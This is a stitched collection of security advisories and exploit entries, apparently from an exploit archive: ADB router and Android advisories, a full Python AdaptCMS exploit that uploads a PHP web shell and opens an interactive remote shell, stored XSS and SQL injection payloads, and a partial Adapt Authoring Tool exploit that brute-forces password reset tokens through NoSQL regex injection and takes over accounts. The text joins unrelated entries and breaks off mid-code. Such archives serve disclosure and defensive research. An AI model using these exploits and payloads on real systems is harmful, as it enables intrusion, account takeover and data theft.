yet another purposeful solution by A D B Broadband
..................................................................
root@$hostname:~# id
uid=0(root) gid=0(root) groups=0(root)
root@$hostname:~#
Vulnerable / tested versions:
-----------------------------
The following devices & firmware have been tested which were the most recent
versions at the time of discovery.
The firmware versions depend on the ISP / customer of ADB and may vary!
ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP
etc.
It has been confirmed by ADB that _all_ their ADB modems / gateways / routers
based on the Epicentro platform with USB ports and network file sharing
features are affected by this vulnerability in all firmware versions for all
their customers (ISPs) at the time of identification of the vulnerability.
Vendor contact timeline:
------------------------
2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory
Asking about affected devices / firmware, timeline for hotfix
Fast initial response from ADB providing requested information
2016-06-16: Asking about other affected devices
2016-06-17: Resending previous question due to encryption problems
2016-07-04: Conference call
2016-07 - 2017-04: Further coordination, waiting for firmware release,
implementation & rollout phases for their customers
2018-07-04: Embargo lifted, public release of security advisory
Solution:
---------
The firmware versions depend on the ISP / customer of ADB and may vary!
Patch version:
ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
ADB DV2210 >= E_5.3.2, firmware version depending on ISP
ADB VV5522 >= E_8.3.2, firmware version depending on ISP
ADB VV2220 >= E_9.3.2, firmware version depending on ISP
Centro Business 1 >= 7.12.10
Centro Business 2 >= 8.06.08
etc.
Workaround:
-----------
Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don't allow remote access to the web GUI via Internet.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF J. Greil / @2018
SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
=======================================================================
title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13109
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-28
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
------------------------
By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
-----------------------------------
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.
An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI, any further subsequent layers/paths (sub menus) were not possible to access
during testing but further exploitation can't be ruled out entirely.
Proof of concept:
-----------------
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver
Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver
This works for many other settings within the web GUI!
In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp
Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.
Vulnerable / tested versions:
-----------------------------
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:
The firmware versions depend on the ISP / customer of ADB and may vary!
ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP
etc.
It has been confirmed by ADB that _all_ their ADB modems / gateways / routers
based on the Epicentro platform are affected by this vulnerability in all
firmware versions for all their customers (ISPs) at the time of identification
of the vulnerability _except_ those devices which have a custom UI developed
for the ISP.
Vendor contact timeline:
------------------------
2016-07-01: Contacting vendor ADB, sending encrypted advisory, asking about
affected devices
2016-07-08: Receiving information about affected devices
2016-07 - 2017-04: Further coordination, waiting for firmware release,
implementation & rollout phases for their customers
2018-07-04: Embargo lifted, public release of security advisory
Solution:
---------
The firmware versions depend on the ISP / customer of ADB and may vary!
Patch version:
ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
ADB DV2210 >= E_5.3.2, firmware version depending on ISP
ADB VV5522 >= E_8.3.2, firmware version depending on ISP
ADB VV2220 >= E_9.3.2, firmware version depending on ISP
etc.
Workaround:
-----------
Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don't allow remote access to the web GUI via Internet.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF J. Greil / @2018
ADB backup archive path traversal file overwrite
------------------------------------------------
Using adb one can create a backup of his/her Android device and store it
on the PC. The backup archive is based on the tar file format.
By modifying tar headers to contain ../../ like patterns it is possible
to overwrite files owned by the system user on writeable partitions.
An example pathname in the tar header:
apps/com.android.settings/sp/../../../../data/system/evil.txt
Tar header checksum must be corrected of course.
When restoring the modified archive the BackupManagerService overwrites
the resolved file name, since file name is not sanitized.
Bugfix in the version control:
https://android.googlesource.com/platform/frameworks/base/+/7bc601d%5E!/#F0
Android 5 (Lollipop) and newer versions are not affected (due to the
official bugfix linked above).
Additional conditions for exploiting on pre-Lollipop systems:
- Partition of the desination file must be mounted as writeable (eg.
/system won't work, but /data does)
- It is not possible to overwrite files owned by root, since the process
doing the restore is running as the same user as the package itself and
Android packages cannot run.
- It is not possible to overwrite files owned by system user since AOSP
4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
was introduced "... ignoring non-agent system package ".
(If the operating system is custom and there is a system package
available with a full backup agent specified explicitly, then that
custom Android 4.3 and 4.4 might be affected too.)
Pre 4.3 AOSP systems are affected without further conditions: it is
possible to overwrite files owned by the system user or any other
packages installed on the system.
Tested on: Android 4.0.4:
Reported on: 2014-07-14
Assigned CVE: CVE-2014-7951
Android bug id: 16298491
Discovered by: Imre Rad / Search-Lab Ltd.
http://www.search-lab.hu
http://www.securecodingacademy.com/
# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
# Date: 2019-11-06
# Exploit Author: Mariela L Martínez Hdez
# Vendor Homepage: https://webcompanion.com/en/
# Software Link: https://webcompanion.com/en/
# Version: Adaware Web Companion version 4.8.2078.3950
# Tested on: Windows 10 Home (64 bits)
# 1. Description
# Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path.
# 2. PoC
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
WC Assistant WCAssistantService C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe Auto
C:\>sc qc WCAssistantService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WCAssistantService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : WC Assistant
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or othersecurity applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-01-05
#Vendor Homepage : http://webcompanion.com/
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
#Tested on OS: Windows 10
#Analyze PoC :
==============
C:\Users\ZwX>sc qc WCAssistantService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: WCAssistantService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WC Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#!/usr/bin/env python
#
#
# AdaptCMS 3.0.3 Remote Command Execution Exploit
#
#
# Vendor: Insane Visions
# Product web page: http://www.adaptcms.com
# Affected version: 3.0.3
#
# Summary: AdaptCMS is a Content Management System trying
# to be both simple and easy to use, as well as very agile
# and extendable. Not only so we can easily create Plugins
# or additions, but so other developers can get involved.
# Using CakePHP we are able to achieve this with a built-in
# plugin system and MVC setup, allowing us to focus on the
# details and end-users to focus on building their website
# to look and feel great.
#
# Desc: AdaptCMS suffers from an authenticated arbitrary
# command execution vulnerability. The issue is caused due
# to the improper verification of uploaded files. This can
# be exploited to execute arbitrary PHP code by creating
# or uploading a malicious PHP script file that will be
# stored in '\app\webroot\uploads' directory.
#
# Tested on: Apache 2.4.10 (Win32)
# PHP 5.6.3
# MySQL 5.6.21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5220
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5220.php
#
#
# 29.12.2014
#
#
import itertools, mimetools, mimetypes, os
import cookielib, urllib, urllib2, sys, re
from cStringIO import StringIO
from urllib2 import URLError
piton = os.path.basename(sys.argv[0])
def bannerche():
print """
o==========================================o
| |
| AdaptCMS RCE Exploit |
| |
| ID:ZSL-2015-5220 |
| o/ |
+------------------------------------------+
"""
if len(sys.argv) < 3:
print '\x20\x20[*] Usage: '+piton+' <hostname> <pathname>'
print '\x20\x20[*] Example: '+piton+' zeroscience.mk adaptcms\n'
sys.exit()
bannerche()
host = sys.argv[1]
path = sys.argv[2]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
gettokens = opener.open('http://'+host+'/'+path+'/login')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print 'Path error.'
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print 'Hostname error.'
sys.exit()
print '\x20\x20[*] Login please.'
tokenfields = re.search('fields]" value="(.+?)" id=', gettokens.read()).group(1)
gettokens = opener.open('http://'+host+'/'+path+'/login')
tokenkey = re.search('key]" value="(.+?)" id=', gettokens.read()).group(1)
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'_method' : 'POST',
'data[User][username]' : username,
'data[User][password]' : password,
'data[_Token][fields]' : '864206fbf949830ca94401a65660278ae7d065b3%3A',
'data[_Token][key]' : tokenkey,
'data[_Token][unlocked]' : ''
})
login = opener.open('http://'+host+'/'+path+'/login', login_data)
auth = login.read()
for session in cj:
sessid = session.name
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Accessing...'
upload = opener.open('http://'+host+'/'+path+'/admin/files/add')
filetoken = re.search('key]" value="(.+?)" id=', upload.read()).group(1)
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('_method', 'POST')
form.add_field('data[_Token][key]', filetoken)
form.add_field('data[File][type]', 'edit')
form.add_field('data[0][File][filename]', '')
form.add_field('data[0][File][dir]', 'uploads/')
form.add_field('data[0][File][mimetype]', '')
form.add_field('data[0][File][filesize]', '')
form.add_field('data[File][content]', '<?php echo "<pre>"; passthru($_GET[\'cmd\']); echo "</pre>"; ?>')
form.add_field('data[File][file_extension]', 'php')
form.add_field('data[File][file_name]', 'thricer')
form.add_field('data[File][caption]', 'THESHELL')
form.add_field('data[File][dir]', 'uploads/')
form.add_field('data[0][File][caption]', '')
form.add_field('data[0][File][watermark]', '0')
form.add_field('data[0][File][zoom]', 'C')
form.add_field('data[File][resize_width]', '')
form.add_field('data[File][resize_height]', '')
form.add_field('data[0][File][random_filename]', '0')
form.add_field('data[File][library]', '')
form.add_field('data[_Token][fields]', '0e50b5f22866de5e6f3b959ace9768ea7a63ff3c%3A0.File.dir%7C0.File.filesize%7C0.File.mimetype%7CFile.dir')
form.add_file('data[0][File][filename]', 'filename', fileHandle=StringIO(''))
request = urllib2.Request('http://'+host+'/'+path+'/admin/files/add')
request.add_header('User-agent', 'joxypoxy 6.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
f_loc = '/uploads/thricer.php'
print
while True:
try:
cmd = raw_input('shell@'+host+':~# ')
execute = opener.open('http://'+host+'/'+path+f_loc+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print
if cmd.strip() == 'exit':
break
except Exception:
break
print 'Session terminated.\n'
sys.exit()
"""
###############################################################################
AdaptCMS 3.0.3 Multiple Persistent XSS Vulnerabilities
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
Desc: AdaptCMS version 3.0.3 suffers from multiple stored
cross-site scripting vulnerabilities. Input passed to several
POST parameters is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an
affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5218
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5218.php
29.12.2014
--
==========================================
#1 Stored XSS
POST parameter: data[Category][title]
------------------------------------------
POST /adaptcms/admin/categories/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/categories/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
_method=POST&data%5B_Token%5D%5Bkey%5D=851f8e2e973800b2b0635d5157c55369bcade604&data%5BCategory%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&data%5B_Token%5D%5Bfields%5D=14d1551ece2201712436bf482f7e776f422a7966%253A&data%5B_Token%5D%5Bunlocked%5D=
=======================================
#2 Stored XSS
POST parameter: data[Field][title]
---------------------------------------
POST /adaptcms/admin/fields/ajax_fields/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/adaptcms/admin/fields/add
Content-Length: 141
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
data%5BField%5D%5Bcategory_id%5D=2&data%5BField%5D%5Btitle%5D=%22%3E%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&data%5BField%5D%5Bdescription%5D=
=========================
#3 Stored XSS
POST parameter: name
-------------------------
POST /adaptcms/admin/tools/create_theme?finish=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://localhost/adaptcms/admin/tools/create_theme
Content-Length: 242
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"basicInfo":{"name":"\"><script>alert(3);</script>","block_active":"","is_fields":"","is_searchable":""},"versions":{"current_version":"1.0","versions":["1.0","111"]},"skeleton":{"controller":false,"model":false,"layout":true,"views":false}}
===========================================
#4 Stored XSS
POST parameter: data[Link][link_title]
-------------------------------------------
POST /adaptcms/admin/links/links/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/admin/links/links/add
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
_method=POST&data%5B_Token%5D%5Bkey%5D=2c5e2f46b5c13a78395b2e79303543cd4d444789&data%5BLink%5D%5Btitle%5D=444&data%5BLink%5D%5Burl%5D=http%3A%2F%2Fzeroscience.mk&data%5BLink%5D%5Blink_title%5D="><script>alert(4);</script>&data%5BLink%5D%5Blink_target%5D=_new&data%5BLink%5D%5Bactive%5D=0&data%5BLink%5D%5Bactive%5D=1&data%5BLink%5D%5Btype%5D=&data%5BLink%5D%5Bimage_url%5D=&data%5BLink%5D%5Bselect_all%5D=0&data%5BLink%5D%5Bselect_none%5D=0&data%5BLink%5D%5Bsort_by%5D=&data%5BLink%5D%5Bsort_direction%5D=&data%5B_Token%5D%5Bfields%5D=34394f00acd7233477b8cd9e681e331f083052a5%253A&data%5B_Token%5D%5Bunlocked%5D=
==============================================
#5 Stored XSS
POST parameter: data[ForumTopic][subject]
----------------------------------------------
POST /adaptcms/forums/off-topic/new HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/adaptcms/forums/off-topic/new
Cookie: adaptcms=c4fqklpt7gneokqbbv4iq1e5b1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
_method=POST&data%5B_Token%5D%5Bkey%5D=4c5428572b6454152377ae8db2c3a8a753f39dba&data%5BForumTopic%5D%5Bsubject%5D=%22%3E%3Cscript%3Ealert%285%29%3B%3C%2Fscript%3E&data%5BForumTopic%5D%5Bcontent%5D=%3Cp%3Etestingcontent%3C%2Fp%3E&data%5BForumTopic%5D%5Btopic_type%5D=topic&data%5BForumTopic%5D%5Bforum_id%5D=1&data%5B_Token%5D%5Bfields%5D=bcff03f6432e544b05d877fcdd8c29f13155693a%253AForumTopic.forum_id%257CForumTopic.topic_type&data%5B_Token%5D%5Bunlocked%5D=
###############################################################################
AdaptCMS 3.0.3 HTTP Referer Header Field Open Redirect Vulnerability
Vendor: Insane Visions
Product web page: http://www.adaptcms.com
Affected version: 3.0.3
Summary: AdaptCMS is a Content Management System trying
to be both simple and easy to use, as well as very agile
and extendable. Not only so we can easily create Plugins
or additions, but so other developers can get involved.
Using CakePHP we are able to achieve this with a built-in
plugin system and MVC setup, allowing us to focus on the
details and end-users to focus on building their website
to look and feel great.
Desc: Input passed via the 'Referer' header field is not
properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary
website e.g. when a user clicks a specially crafted link
to the affected script hosted on a trusted domain.
====================================
\lib\Cake\Controller\Controller.php:
------------------------------------
Line: 956
..
..
Line: 974
------------------------------------
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5219
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5219.php
29.12.2014
--
GET /adaptcms/admin/adaptbb/webroot/foo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adaptcms=uu16dmimdemvcq54h3nevq6oa0
Connection: keep-alive
Referer: http://zeroscience.mk
"""
source: https://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--
source: https://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]
source: https://www.securityfocus.com/bid/54097/info
AdaptCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
AdaptCMS 2.0.2 is vulnerable.
http://www.example.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E
source: https://www.securityfocus.com/bid/49769/info
AdaptCMS is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AdaptCMS 2.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/AdaptCMS/admin.php?view=[XSS]
http://www.example.com/AdaptCMS/admin.php?view=share&do=[XSS]
http://www.example.com/AdaptCMS//index.php?'[XSS]
http://www.example.com/AdaptCMS/admin.php?view=/&view=settings
http://www.example.com/AdaptCMS/admin.php?view=/&view=users
http://www.example.com/AdaptCMS/admin.php?view=/&view=groups
http://www.example.com/AdaptCMS/admin.php?view=/&view=levels
http://www.example.com/AdaptCMS/admin.php?view=/&view=stats
source: https://www.securityfocus.com/bid/50795/info
AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.0 and 2.0.1 are vulnerable; other versions may also be affected.
http://www.example.com/article/'66/Blog/AdaptCMS-20-March-26th
http://www.example.com/article/'75/News/AdaptCMS-200-Released
http://www.example.com/article/'293/Album/Pink-Floyd-Animals
http://www.example.com/article/'294/News/AdaptCMS-202-Update
# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671
import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap
def get_session_cookie(username, password):
data = {"email": username, "password": password}
res = requests.post(f"{args.url}/api/login", data=data)
if res.status_code == 200:
print(f"[+] Login as {username}")
return res.cookies.get_dict()
return None
def get_users():
session_cookie = get_session_cookie(args.username, args.password)
if session_cookie is None:
print("[-] Login failed")
sys.exit()
res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
users = [
{"email": user["email"], "role": user["roles"][0]["name"]}
for user in json.loads(res.text)
]
roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
users.sort(key=lambda user: roles[user["role"]])
for user in users:
print(f"[+] {user['email']} ({user['role']})")
return users
def reset_password(users):
# Overwrite potentially expired password reset tokens
for user in users:
data = {"email": user["email"]}
requests.post(f"{args.url}/api/createtoken", data=data)
print("[+] Generate password reset token for every user")
valid_characters = "0123456789abcdef"
next_tokens = ["^"]
# Ensure that only a single result is returned at a time
while next_tokens:
prev_tokens = next_tokens
next_tokens = []
for token in prev_tokens:
for ch in valid_characters:
data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
res = requests.put(
f"{args.url}/api/userpasswordreset/w00tw00t",
json=data,
)
# Multiple results returned
if res.status_code == 500:
next_tokens.append(token + ch)
